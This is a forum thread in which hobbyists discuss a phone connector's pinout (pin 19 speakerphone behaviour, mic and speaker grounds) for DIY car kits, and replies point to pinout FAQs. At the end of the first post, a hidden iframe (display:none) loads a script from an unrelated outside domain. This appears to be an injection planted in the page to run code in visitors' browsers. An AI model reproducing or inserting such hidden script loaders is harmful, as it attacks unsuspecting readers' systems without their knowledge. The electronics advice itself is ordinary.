PIN 19 & car kits

It seem PIN 19 does the following
- at 5V nothing
- switched to 5V after a call is active it turns on the speaker phone
- at ground, turns on speaker phone when a call is active, and switches off the internal mic and speaker.

Is there a way of having the speaker phone turn on automatically in the car and keep the internal mic and speaker active.

Or is there a simple way to hook up an external speaker - I notice PIN 3& 4 L&R - what PIN is ground for the external speaker also the Mic_In PIN 1 what is the ground for the mic and can you hook this directly to a standard car kit mic? <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The pinouts are covered in depth at xda-developers.com, I saw your post there but maybe you haven't found that part of their site, try:

http://xda-developers.com/connectors/

A few people have posted here about DIY carkits, check back through the postings, you might find something useful.

Anyone who's done a carkit, reveal yourself. And now send a message to Steve.

FAQs and thoughts

HERE is the FAQ for the pinout.

HERE is the FAQ for car kits.

HERE is an FAQ about using the speaker phone in a car.

HERE is an FAQ about connecting the sound to your car stereo.

If you get more info on this, please post to the appropriate FAQ.

My personal opinion is that you do NOT want to enable the speakerphone in a car. The reason is that the phone works great without it. The mic is VERY good in car, without Speakerphone enabled. I have mine mounted on the dash, in a fairly noisy Jeep. I've never had anyone complain that they couldn't hear me, and I've had people sitting in the back seat participate in the conversation. The Kyocera car kit I used with my last phone was no where near that experience. Assuming you agree with mic scenario I've described, then you only need to get the audio-out to play through the car stereo. You can do this by using the headphone jack with a non-stereo adapter that doesn't properly disable the mic, or you tap into the correct pins on the I/O adapter.

ground

I would try Pin 5. My guess is that any of them would work, but that one looks logically grouped with the left and right audio.
